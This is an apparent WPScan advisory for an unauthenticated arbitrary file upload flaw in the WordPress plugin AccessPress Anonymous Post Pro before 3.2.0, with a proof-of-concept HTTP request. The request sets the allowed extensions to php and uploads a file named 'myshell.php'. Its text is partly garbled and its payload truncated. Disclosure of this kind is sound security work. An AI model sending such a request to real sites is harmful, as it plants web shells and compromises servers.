Lucene search

K
wpvulndbColette ChamberlandWPVDB-ID:4C177B54-7E25-436F-9FE8-051343B51E94
HistoryDec 19, 2017 - 12:00 a.m.

AccessPress Anonymous Post Pro < 3.2.0 - Unauthenticated Arbitrary File Upload

2017-12-1900:00:00
Colette Chamberland
wpscan.com
6

0.056 Low

EPSS

Percentile

93.3%

Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters.

PoC

OST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file;_uploader_nonce=[nonce]&allowedExtensions;[]=php&sizeLimit;=64000 HTTP/1.1 Host:target.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792 Content-Length: 264 Referer: http://target.com/ Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; Connection: close Upgrade-Insecure-Requests: 1 -----------------------------7230359611602921801124357792 Content-Disposition: form-data; name=“qqfile”; filename=“myshell.php” Content-Type: text/php &1’); ?> -----------------------------7230359611602921801124357792–

CPENameOperatorVersion
accesspress-anonymous-post-prolt3.2.0

0.056 Low

EPSS

Percentile

93.3%

Related for WPVDB-ID:4C177B54-7E25-436F-9FE8-051343B51E94